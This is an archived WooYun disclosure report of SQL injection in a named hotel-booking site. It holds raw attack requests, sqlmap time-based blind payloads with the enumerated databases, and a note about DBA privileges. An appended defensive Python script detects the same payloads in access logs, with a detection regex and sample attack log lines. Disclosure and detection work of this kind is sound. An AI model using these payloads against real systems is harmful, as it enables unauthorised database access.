WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-23: Details have been sent to the vendor and are awaiting vendor handling
2015-12-27: Vendor has confirmed; details are disclosed to the vendor only
2016-01-06: Details disclosed to core white hats and experts in the relevant field
2016-01-16: Details disclosed to regular white hats
2016-01-26: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public
2333
GET /order.html?available=&display=&hname=&hotelid=&id=&personcome=*&unmember=1 HTTP/1.1
X-Forwarded-For: 8.8.8.8'
X-Requested-With: XMLHttpRequest
Referer: http://fanmei.zhuzher.com:80/
Cookie: JSESSIONID=CDDFBEDD30FED12CEF0EDD334B2E874C
Host: fanmei.zhuzher.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The personcome parameter is injectable.
Took a look at the privileges: DBA privileges.
Another SQL injection point:
GET /hotelList.html?searchHotel.cityid=2&searchHotel.enddate=2015-12-24&searchHotel.personcome=*/&searchHotel.startdate=2015-12-23&searchHotel.town= HTTP/1.1
X-Forwarded-For: 8.8.8.8'
X-Requested-With: XMLHttpRequest
Referer: http://fanmei.zhuzher.com:80/
Cookie: JSESSIONID=CDDFBEDD30FED12CEF0EDD334B2E874C
Host: fanmei.zhuzher.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The searchHotel.personcome parameter is injectable.
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://fanmei.zhuzher.com:80/hotelList.html?searchHotel.cityid=2&searchHotel.enddate=2015-12-24&searchHotel.personcome=' AND (SELECT * FROM (SELECT(SLEEP(5)))MwmI) AND 'uAsb'='uAsb/&searchHotel.startdate=2015-12-23&searchHotel.town=
---
[15:45:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[15:45:41] [INFO] fetching database names
[15:45:41] [INFO] fetching number of databases
[15:45:41] [INFO] retrieved:
[15:45:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y5
[15:46:48] [INFO] retrieved:
[15:47:18] [INFO] adjusting time delay to 2 seconds due to good response times
[15:48:20] [ERROR] invalid character detected. retrying..
[15:48:20] [WARNING] increasing time delay to 3 seconds
[15:49:52] [ERROR] invalid character detected. retrying..
[15:49:52] [WARNING] increasing time delay to 4 seconds
infor
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://fanmei.zhuzher.com:80/order.html?available=&display=&hname=&hotelid=&id=&personcome=' AND (SELECT * FROM (SELECT(SLEEP(5)))tBpE) AND 'sgjo'='sgjo&unmember=1
---
[15:17:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[15:17:11] [INFO] fetching database names
[15:17:11] [INFO] fetching number of databases
[15:17:11] [INFO] retrieved:
[15:17:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y5
[15:17:26] [INFO] retrieved:
[15:17:31] [INFO] adjusting time delay to 1 second due to good response timesinformatioa
[15:18:46] [ERROR] invalid character detected. retrying..
[15:18:46] [WARNING] increasing time delay to 2 seconds_schema
[15:19:57] [INFO] retrieved: fanmei
[15:20:46] [INFO] retrieved: haolaide
[15:22:04] [ERROR] invalid character detected. retrying..
[15:22:04] [WARNING] increasing time delay to 3 secondsng
[15:22:35] [INFO] retrieved: mysql
[15:23:44] [INFO] retrieved: test
available databases [5]:
[*] fanmei
[*] haolaideng
[*] informatioa_schema
[*] mysql
[*] test
[15:24:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 503 times
[15:24:40] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\fanmei.zhuzher.com'
[*] shutting down at 15:24:40
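The sqlmap output above leaves two traces a defender can alert on: the SLEEP()-based payload in the personcome / searchHotel.personcome query parameter, and the 503 HTTP 500 responses the run produced on a single endpoint. The following script is an added example (not part of this report or of the site's code) that scans access-log lines for both signals; the log lines are constructed for the example, and the function names and the combined-log regex are this example's own assumptions.

```python
"""Spot time-based blind SQL injection probing in web access logs.

Added example, not part of the original report. The log lines in
SAMPLE_LOG are constructed for this example and are not real traffic.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in an Apache "combined"-like layout. The two
# payload lines reproduce the shape reported by sqlmap in the text above,
# percent-encoded as a browser or tool would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Dec/2015:15:17:11 +0800] "GET /order.html?available=&display=&hname=&hotelid=&id=&personcome=%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29tBpE%29%20AND%20%27sgjo%27%3D%27sgjo&unmember=1 HTTP/1.1" 500 1203
10.0.0.5 - - [23/Dec/2015:15:17:12 +0800] "GET /order.html?available=&display=&hname=&hotelid=&id=&personcome=2&unmember=1 HTTP/1.1" 200 8810
10.0.0.7 - - [23/Dec/2015:15:17:13 +0800] "GET /hotelList.html?searchHotel.cityid=2&searchHotel.personcome=2 HTTP/1.1" 200 9120
10.0.0.5 - - [23/Dec/2015:15:17:14 +0800] "GET /hotelList.html?searchHotel.cityid=2&searchHotel.personcome=%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29MwmI%29%20AND%20%27uAsb%27%3D%27uAsb/ HTTP/1.1" 500 1203
10.0.0.5 - - [23/Dec/2015:15:17:15 +0800] "GET /order.html?personcome=%27%20AND%20BENCHMARK%2810000000%2CMD5%281%29%29%20AND%20%27a%27%3D%27a HTTP/1.1" 500 1203
"""

# Assumed log layout: ip ident user [ts] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Delay primitives used by time-based blind injection on common DBMSs.
# Matched against the URL-decoded parameter value, not the raw query string,
# so percent-encoding or '+' for space does not hide them.
TIME_BASED_RE = re.compile(
    r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY\b", re.IGNORECASE
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so empty parameters (hotelid=) are still listed
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def find_time_based_payloads(log_text):
    """Return (ip, path, param, decoded_value) for each parameter carrying a delay primitive."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if TIME_BASED_RE.search(value):
                hits.append((rec["ip"], rec["path"], name, value))
    return hits


def count_server_errors(log_text):
    """Count 5xx responses per (client ip, path); blind-injection runs leave bursts of them."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and 500 <= rec["status"] < 600:
            counts[(rec["ip"], rec["path"])] += 1
    return counts


if __name__ == "__main__":
    for ip, path, name, value in find_time_based_payloads(SAMPLE_LOG):
        print(f"{ip} {path} param={name!r} value={value!r}")
    for (ip, path), n in count_server_errors(SAMPLE_LOG).most_common():
        print(f"{ip} {path}: {n} server errors")
```

The decode-then-match order matters: the raw query string in the log only contains `SLEEP%285%29`, so a pattern applied before URL-decoding would miss it. The error counter is the cheaper, payload-agnostic signal; pairing it with the parameter match keeps a single malformed request from paging anyone.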
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-12-27 20:13
Confirmed
None yet